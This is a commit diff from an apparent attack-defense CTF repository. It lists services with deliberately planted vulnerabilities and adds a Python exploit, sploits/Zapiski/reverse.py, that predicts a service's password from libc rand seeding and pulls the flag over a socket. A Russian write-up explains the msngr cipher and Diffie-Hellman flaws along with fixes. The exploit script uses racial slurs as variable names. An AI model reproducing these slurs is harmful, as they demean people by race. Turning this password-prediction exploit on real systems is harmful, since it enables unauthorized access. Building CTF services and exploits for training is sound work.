Infra ready

* Remove example service * Modify README.md * Fix typo in Zapiski service link * My services * Bring back data.db from amogus_plus_plus * Delete users.db-journal * hihi haha :D * Pin container versions * Revert to ubuntu:latest * Increase workspace lifetime to 900 seconds * Edit msngr timeout and remove TODOs --------- Co-authored-by: root <root@DESKTOP-RB4SU4F> Co-authored-by: P0LK07 <[email protected]>
dtlhub · Jul 23, 2023 · d637247 · d637247
1 parent 6eb70c1
commit d637247
Show file tree

Hide file tree

Showing 17 changed files with 82 additions and 234 deletions.
diff --git a/.github/workflows/check-services.yml b/.github/workflows/check-services.yml
@@ -35,7 +35,6 @@ jobs:
     strategy:
       matrix:
         service:
-        - example
         - schizichs 
         - amogus_plus_plus
         - jeopardy

diff --git a/README.md b/README.md
@@ -1,19 +1,25 @@
-# ad-boilerplate
+# dtlad2023
 
-[![check-services](https://github.com/dtlhub/dtlad2023/actions/workflows/check-services.yml/badge.svg?branch=master&event=push)](https://github.com/dtlhub/dtlad2023/actions/workflows/check-services.yml)
+<!-- СЮДА ВСТАВИТЬ ДЕСКРИПШОН НЕ ЗАБЫТЬ -->
 
-Development workflow:
+## Services
 
-1) Create branch named `$SERVICE`.
-2) Write your code in `services/$SERVICE`, `checkers/$SERVICE`, `sploits/$SERVICE` and `internal/$SERVICE` (if needed).
-3) Validate your service with `SERVICE=$SERVICE ./check.py validate`.
-4) Up your service with `SERVICE=$SERVICE ./check.py up`.
-5) Check your service with `SERVICE=$SERVICE RUNS=200 ./check.py check`.
-6) Down your service with `SERVICE=$SERVICE ./check.py down`.
-7) Add your service to `.github/workflows/check-services.yml`, line 38.
-8) Push your code and create pull request to master branch.
+| Service                                        | Language            | Vulns                                                                 | Authors                                 |
+| ---------------------------------------------- | ------------------- | --------------------------------------------------------------------- | --------------------------------------- |
+| [amogus_plus_plus](services/amogus_plus_plus/) | JavaScript & Svelte | Default creds, missconfiguration, path traversal, prototype pollution | [@LeKSuS](https://github.com/LeKSuS-04) |
+| [jeopardy](services/jeopardy/)                 | Python              | Default keys, using stream cipher for signing, small nonces for ecdsa | [@defkit](https://t.me/defkit)|
+| [msngr](services/msngr/)                       | Python              | Linear sbox in substitution-permutation cipher, dlp with chosen parameters| [@defkit](https://t.me/defkit)                              |
+| [schizichs](services/schizichs/)               | Go                  | ???                                                                   | [???](???)                              |
+| [Zapiski](services/Zapiski/)                   | C                   | ???                                                                   | [???](???)                              |
 
-Don't forget to:
-1) Add your checker requirements to `checkers/requirements.txt`.
-2) Use `dedcleaner` container to delete old files if needed. Example can be found in `services/example/docker-compose.yml`.
-3) Add info about your checker to `Checker` class. Example can be found in `checkers/example/checker.py`, line 11.
+## Infrastructure
+
+- DevOps: [@LeKSuS](https://github.com/LeKSuS-04)
+- Checksystem: [ForcAD](https://github.com/pomo-mondreganto/ForcAD)
+
+## Writeups & sploits
+
+- [amogus_plus_plus](/sploits/amogus_plus_plus/)
+- [jeopardy](/sploits/jeopardy/)
+- [schizichs](/sploits/schizichs/)
+- [msngr](/sploits/msngr)
diff --git a/checkers/example/checker.py b/checkers/example/checker.py
diff --git a/checkers/example/example_lib.py b/checkers/example/example_lib.py
diff --git a/checkers/msngr/checker.py b/checkers/msngr/checker.py
@@ -30,7 +30,7 @@ def get_random_secret_string(length: int = 15) -> str:
 
 class Checker(BaseChecker):
     vulns: int = 1
-    timeout: int = 30
+    timeout: int = 20
     uses_attack_data: bool = True
 
     def __init__(self, *args, **kwargs):
@@ -97,9 +97,6 @@ def check_crypto(self):
         decrypted_hello = bytes.fromhex(decrypted_hello_hex)
         self.assert_eq(decrypted_hello, hello_message.encode(), "Decrypt(encrypt(hello)) != hello")
 
-        # TODO: check commuticate_ask_to_encrypt
-        # TODO: check communicate_ask_for_secret
-
     def check(self):
         self.check_auth()
         self.check_crypto()

diff --git a/services/amogus_plus_plus/cleaner/cleaner.sh b/services/amogus_plus_plus/cleaner/cleaner.sh
@@ -6,7 +6,7 @@ while true; do
     find "/tmp/data/" \
         -type d \
         -and -not -path "/tmp/data/" \
-        -and -not -newermt "-60 seconds" \
+        -and -not -newermt "-900 seconds" \
         -exec rm -r {} +
 
     sleep 60

diff --git a/services/amogus_plus_plus/pocketbase/pb_data/data.db b/services/amogus_plus_plus/pocketbase/pb_data/data.db
diff --git a/services/example/Dockerfile b/services/example/Dockerfile
diff --git a/services/example/docker-compose.yml b/services/example/docker-compose.yml
diff --git a/services/example/requirements.txt b/services/example/requirements.txt
diff --git a/services/example/src/app.py b/services/example/src/app.py
diff --git a/services/msngr/data/users.db-journal b/services/msngr/data/users.db-journal
diff --git a/services/schizichs/docker-compose.yml b/services/schizichs/docker-compose.yml
@@ -15,7 +15,7 @@ services:
     cpus: 0.5
 
   db:
-    image: mysql
+    image: mysql:8.0
     restart: unless-stopped
     env_file: .env
     volumes:

diff --git a/services/schizichs/src/Dockerfile b/services/schizichs/src/Dockerfile
@@ -1,4 +1,4 @@
-FROM golang:alpine AS builder
+FROM golang:alpine3.18 AS builder
 
 RUN apk update
 

diff --git a/sploits/Zapiski/reverse.py b/sploits/Zapiski/reverse.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+
+import sys
+import socket
+import requests
+from ctypes import CDLL
+
+def unsigned(byte_str: bytes):
+    nigger = 0x1
+    chingchong = 0x100
+    out = 0x0
+    for i in byte_str:
+        out += i * nigger
+        nigger *= chingchong
+    return out
+
+def reverse_get_pass(username : str):
+    libc = CDLL("libc.so.6")
+    username = username.encode()
+    key1 = unsigned(username[:4])
+    key2 = unsigned(username[4:])
+    libc.srand(key1)
+    some_censored_word = libc.rand()
+    for papa in range(13):
+        some_censored_word ^= libc.rand()
+    some_censored_word ^= key2
+    password = hex(some_censored_word)[2:]
+    return password
+
+ADDR = (sys.argv[1], 5712)
+hint = sys.argv[2].split(':')
+print(hint[0])
+password = reverse_get_pass(hint[0])
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(ADDR)
+s.settimeout(5)
+s.recv(1024)
+s.send(b'1\n')
+s.recv(1024)
+s.send((password + '\n').encode())
+s.recv(1024)
+s.recv(1024)
+s.send(b'2\n')
+s.recv(1024)
+s.send(hint[1].encode())
+flag = s.recv(1024)
+s.recv(1024)
+s.send(b'3\n')
+print(flag.decode(), flush= True)
diff --git a/sploits/example/unprotected_read.py b/sploits/example/unprotected_read.py
diff --git a/sploits/msngr/README.md b/sploits/msngr/README.md
@@ -0,0 +1,8 @@
+## MSNGR 
+
+1) Линейный сбокс. То есть в подстановочно-перестановочной сети подстановка это то же самое, что и перестановка. Получается итоговое одного раунда SP(x ^ key) = SP(x) ^ SP(key). То есть шифрование вырождается в ксор на какую то константу. Ну а дальше вы сами справитесь, ребята умные. 
+2) При обмене ключей по дифи-хеллману вы можете достать секретный ключ вашего друга. Просто выбрать такое p, что #GF(p) будет гладким, по нему легко посчитается ДЛП
+
+Как захотфиксить? 
+1) Поменять сбокс на нелинейный, или шифрование на другое.
+2) Поменять класс кей эксченджер на безопасные значения, игнорить ввод других мужиков